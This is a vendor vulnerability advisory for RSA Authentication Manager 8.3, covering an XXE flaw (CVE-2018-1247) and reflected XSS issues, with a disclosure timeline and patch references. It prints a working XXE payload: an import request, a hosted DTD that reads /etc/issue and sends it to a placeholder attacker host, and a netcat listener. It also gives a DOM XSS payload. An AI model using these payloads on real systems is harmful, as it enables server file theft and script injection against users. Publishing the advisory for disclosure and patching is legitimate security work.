EMC RSA Authentication Manager CVE-2018-1247 – XML External Entity Injection

Authors:SEC Consult             Risk:High

CVE:CVE-2018-1247              0day:XML External Entity Injection 

0day -id:0DAY-176191            Date:2018-05-17


RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application.


“RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA’s award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime.”

Source: https://www.rsa.com/en-us/company/about

Business recommendation

By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side

SEC Consult recommends to apply the available patches from the vendor.

Cross-site Flashing

The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim’s web browser. Once the victim clicks a
malicious link the attacker’s code is executed in the context of the victim’s
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

DOM based Cross-site Scripting

Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.


XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected

POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]
Content-Disposition: form-data; name="textImportFileName.theFile";
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
Content-Disposition: form-data; name="textImportFileName.uploadResult"

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:

# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">

Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:

# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager% HTTP/1.1

Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.

Cross-site Flashing

The issue affects a third party component pmfso (DSA-2018-082).
To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:

DOM based Cross-site Scripting

Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).
To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):

window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";

Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Vulnerable / tested versions

The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version which was the latest
version available during the test.


2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
 to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
 plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of uncoordinated public
 release and status information
2018-05-08: Vendor provides an update regarding their public release and
 status of vulnerabilities not included in the release, vendor info:
 * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
 was released on 5/4
 * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
 was released on 5/3
2018-05-16: Security advisory release


The vendor has released an advisory that contains recommendations of how to
resolve the reported XML External Entity Injection Vulnerability:
DSA-2018-086 – https://community.rsa.com/docs/DOC-92085 – (RSA Link Sign On Required)

Full Disclosure archive:

Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (only Example 1) issues provided in the
descriptions above.



Advisory URL



Leave a Reply